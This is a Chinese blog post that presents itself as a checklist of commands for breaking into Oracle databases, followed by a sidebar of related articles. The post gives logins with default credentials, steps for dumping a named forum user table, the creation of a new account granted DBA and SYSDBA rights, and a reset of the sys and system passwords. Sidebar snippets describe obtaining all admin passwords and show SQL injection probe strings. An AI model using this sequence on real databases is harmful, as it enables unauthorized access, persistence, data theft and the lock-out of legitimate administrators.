入侵Oracle数据库时常用的操作命令整理

最新推荐文章于 2024-09-09 09:47:53 发布
最新推荐文章于 2024-09-09 09:47:53 发布
阅读量948 收藏
点赞数
分类专栏: 数据库 文章标签: 数据库 oracle bbs database table user

本文按步骤讲解如何入侵Oracle数据库时常用的操作命令整理。

 

1、su–Oracle不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。

 

2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;

 

3、

 

          
          SQL>connect / as sysdba ;(as sysoper)或 

connect internal/oracle AS SYSDBA ;(scott/tiger) 

conn sys/change_on_install as sysdba;

4、SQL>startup; 启动数据库实例

 

5、 查看当前的所有数据库:

 

          
          select * from v$database; 

select name from v$database; 

desc v$databases; 查看数据库结构字段

6、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:

 

          
          SQL>select * from V_$PWFILE_USERS; 

Show user;查看当前数据库连接用户

7、进入test数据库:database test;

 

8、查看所有的数据库实例:select * from v$instance;

 

如:ora9i

 

9、查看当前库的所有数据表:

 

          
          SQL> select TABLE_NAME from all_tables; 

select * from all_tables; 

SQL> select table_name from all_tables where table_name like '%u%'; 


TABLE_NAME 

------------------------------ 

_default_auditing_options_

10、查看表结构:desc all_tables;

 

11、显示CQI.T_BBS_XUSER的所有字段结构:

 

desc CQI.T_BBS_XUSER;

 

12、获得CQI.T_BBS_XUSER表中的记录:

 

          
          select * from CQI.T_BBS_XUSER;

13、增加数据库用户:

 

          
          create user test11 identified by test default 
tablespace users Temporary TABLESPACE Temp;

14、用户授权:

 

          
          grant connect,resource,dba to test11; 

grant sysdba to test11; 

commit;

15、更改数据库用户的密码:(将sys与system的密码改为test.)

 

          
          alter user sys indentified by test; 

alter user system indentified by test;
 
Tunix126
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
oracle入侵与SQL注射技巧
06-09
oracle入侵与SQL注射技巧
入侵oracle数据库的一些心得
weixin_30896763的博客
08-24 215
件作者:pt007[at]vip.sina.com版权所有,转载请注明版权 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 一、先看下面的一个贴子: Oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点: 1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库,其大小可到几...
入侵oracle数据库常用操作命令整理
killkill
07-26 952
最近遇到一个使用了oracle数据库的服务器,在狂学oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码,我发现oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来,一个星期的心血,版权所有,转载请注明作者.1、su – oracle 不是必需,适合于没有DBA密码使用,可以不用密码来进入sqlplus界面。2、sqlplus /nolog 或sq
数据库安全:入侵Oracle数据库常用操作命令
weixin_34007886的博客
11-08 208
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。1、su – oracle 不是必需,适合于没有DBA密码使用,可以不用密码来进入sqlplus界面。2、sqlplus /nolog 或s...
入侵Oracle数据库常用操作命令
std7879的博客
06-24 223
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle 请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。 1、su – oracle 不是必需,适合于没有DBA密码使用,可以不用密码来进入sqlplus界面。 2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i; 3、SQL>connect /
oracle数据库常用操作命令整理
ssjyr的专栏
10-31 242
源文:http://itmed.blog.sohu.com/97459109.html 最近遇到一个使用了oracle数据库的服务器,在狂学oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码,我发现oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来,一个星期的心血,版权所有,转载请注明作者. 1、su – oracle 不是必需,适合于没有DBA密码使用,可以不用密码来进入sqlplus界面。 2、sqlplus /nolog 或sqlplus s
oracle特有的操作命令,Oracle入侵常用操作命令整理
weixin_27956639的博客
04-03 54
1、su–oracle不是必需,适合于没有DBA密码使用,可以不用密码来进入sqlplus界面。2、sqlplus/nolog或sqlplussystem/manager或./sqlplussystem/manager@ora9i;3、SQL>connect/assysdba;(assysoper)或connectinternal/oracleASSYSDB...
Oracle入侵常用操作命令整理
01-21
1、su – oracle 不是必需,适合于没有DBA密码使用,可以不用密码来进入sqlplus界面。 2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/... 启动数据库实例 5、查看当前的所有数据库: se
【愚公系列】2024年03月 《网络安全应急管理与技术实践》 027-网络安全应急技术与实践(数据库层-Oracle 攻击重现与分析)
热门推荐
时光隧道
02-17 5万+
Oracle 攻击重现与分析是指重新演示和分析Oracle数据库系统中的攻击行为。Oracle数据库是一种常用的关系型数据库管理系统,由于其广泛应用于企业和组织中,其安全性成为黑客攻击的目标之一。在Oracle攻击重现与分析过程中,可以使用各种攻击方法和工具来模拟攻击行为,如SQL注入、系统提权、远程代码执行等。通过重现攻击行为,可以深入了解攻击者的策略和技术手段,从而更好地防御和应对类似的攻击。在分析阶段,可以使用安全日志、审计日志和网络流量等数据来分析攻击的来源、目标和影响。
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
oracle入侵防范,详述oracle入侵和SQL注射方法
weixin_42390873的博客
04-11 206
①判断是否为Oralce数据库:And 0<>(select count(*) from dual) 返回正常页面表示为Oracle数据库②猜解字段数量:使用order by 或者group by逐个提交数字 直到回显错误页面③列出字段数目 比如6个字段数目and 1=1 null,null,null,null,null,null from dual—因为ORACLE数据库是不自动匹配...
利用Oracle漏洞提权笔记
原野
08-31 9824
 1.利用已知的Oracle用户名连上数据库,并创建java提权函数C:/WINDOWS/system32>sqlplus /nologSQL*Plus: Release 9.2.0.1.0 - Production on 星期日 8月 31 14:01:43 2008Copyright (c) 1982, 2002, Oracle Corporation.  Al
spring事务详细讲解-深入浅出
小电玩
09-08 448
Spring 事务是本身就是对数据库的事务的支持,没有数据库的事务 Spring 是本身无法实现事务的。Spring只提供了统一事务管理接口,具体的实现还是由各数据库自己实现。在使用 Spring 事务,可以通过注解或编程方式将需要进行事务管理的方法和代码块标记为事务性操作,当这些操作被执行,Spring 会负责开启根据当前环境中设置的隔离级别,调整数据库隔离级别。
【提效工具】AI工作流的1-10个实际落地场景
最新发布
万物皆有灵
09-09 722
在这个快速发展的数字代,人工智能(AI)正在以惊人的速度改变我们的工作方式。无论你是开发者、教育工作者还是内容创作者,AI工作流提示词助手都能为你提供无与伦比的支持。今天,我们将深入探讨,20个实际落地场景,帮助你更好地理解如何利用这些工具提升工作效率和创造力。💡。
jmeter之setUP、tearDown线程组
回家吃月饼的学习交流地
09-07 504
jmeter之setUP、tearDown线程组的使用
【MYSQL】
ABC1234567890ABM的博客
09-06 943
单列索引情况:根据下图可以看到,查询条件中有phone和name,他们都有单列索引,但是执行explain后发现真正只走了phone的索引,因为phone索引中没有name值,故还需回表走一次聚簇索引。为了避免DML在执行,加的行锁与表锁的冲突,在InnoDB中引入了意向锁,使得表锁不用检查每行数据是否加锁,使用意向锁来减少表锁的检查。全局锁就是对整个数据库实例加锁,加锁后整个实例就处于只读状态,后续的DML的写语句,DDL语句,已经更新操作的事务提交语句都将被阻塞。表级锁,每次操作锁住整张表。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值